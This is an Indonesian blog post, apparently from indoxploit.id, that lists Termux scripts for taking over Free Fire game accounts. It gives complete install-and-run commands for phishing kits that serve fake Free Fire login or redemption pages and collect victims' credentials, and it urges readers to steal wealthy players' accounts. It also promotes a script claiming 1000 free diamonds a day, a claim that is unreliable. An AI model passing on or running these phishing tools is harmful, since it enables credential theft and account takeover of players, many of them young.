Kumpulan Script Hack Akun FF Termux 2021 “Free Fire”

Script Hack Akun FF Termux adalah sebuah tools yang digunakan untuk hack akun ff menggunakan termux 2021.

Free Fire adalah salah satu game para bocil-bocil indonesia yang paling populer saat ini.

Memiliki akun FF sultan adalah sebuah kebanggaan tersendiri bagi para pemiliknya, dilihat dari harga skin, karakter dan aksesoris FF yang sangat mahal.

Jadi, jalan satu-satunya untuk mendapatkan akun sultan adalah dengan hack akun FF dengan termux, dan berharap bisa hack akun sultan FF.

Script Hack Akun FF Termux 2021

Sebenarnya benar ngga sih kalau aplikasi termux bisa untuk hack akun FF, daripada penasaran mending langsung praktik aja yah, kami siapkan nih beberapa script Termux hack akun FF terbaru yang masih work.

BACA  9 Cara Menghemat Kuota Data Internet di HP Android

Untuk kamu yang sedang mencari script hack akun FF termux terbaru, berikut ini adalah beberapa script termux untuk hack akun FF di termux terbaru 2021:

1. Free Fire Phishing – Online Hacking

FREE FIRE – PHISHING ADALAH ALAT PHISHING YANG DIGUNAKAN UNTUK PHIS AKUN FREEFIRE KORBAN ANDA. Alat ini berfungsi pada perangkat Android yang di-rooting dan perangkat Android yang tidak di-rooting.

AVAILABLE ON:

  • Termux App
  • Kali Linux
  • Parrot OS
  • Ubuntu
  • Arch Linux
  • MAC

TESTED ON:

  • Termux App
  • Kali Linux
  • Parrot OS
  • Ubuntu

REQUIREMENTS:

  • internet
  • php
  • ngrok token
  • apache2

FEATURES:

  • [+] Real hacking of Account!
  • [+] Updated maintainence!
  • [+] Custom link!
  • [+] Easy for Beginners!
BACA  Cara install metasploit di termux Android no root

INSTALLATION [Android Termux]:

pkg update -y

pkg upgrade -y

pkg install git 

git clone https://github.com/OnlineHacKing/FreeFire-Phishing.git

cd FreeFire-Phishing

chmod +x *

./Android-Setup

Ada 2 Skrip Alat untuk Android (Gunakan Alat Apa Saja)

onlinehacking-freefire

./OnlineHacking-Phishing.sh

INSTALLATION [Linux]:

sudo apt update -y

sudo apt upgrade -y

sudo apt install git 

git clone https://github.com/OnlineHacKing/FreeFire-Phishing.git

cd FreeFire-Phishing

chmod +x *

./Linux-Setup

./OnlineHacking-Phishing.sh

hack akun ff termux

2. freefirehack

1000 diamonds per hari, cara install (salin script dibawah dan paste ke termux)

pkg install git;pkg install python2;git clone https://github.com/hckble/freefirehack ;cd freefirehack;python2 FFhack.py

Dapatkan 1000 diamonds ff gratis tiap hari

3. Script-Termux-Hack-FF

Berikut ini merupakan script termux hack akun ff (Free Fire) dan fungsinya untuk membuat halaman login palsu atau phising ff.

pkg install git unzip bash openssh php

pip install requests

git clone https://github.com/ac10ac10/script-termux-hack-ff

cd fakeredeemff

unzip FreeFire.zip

cd FreeFire

bash freefire.sh

php hasil.php

Beberapa script hack akun FF termux 2021 di atas bisa kamu gunakan untuk hack akun FF sultan loh, selamat mencoba yah.

BACA  3 Cara membuka situs dewasa di Android tanpa Aplikasi

Live Hacking

Admin website indoxploit.id

Tinggalkan Balasan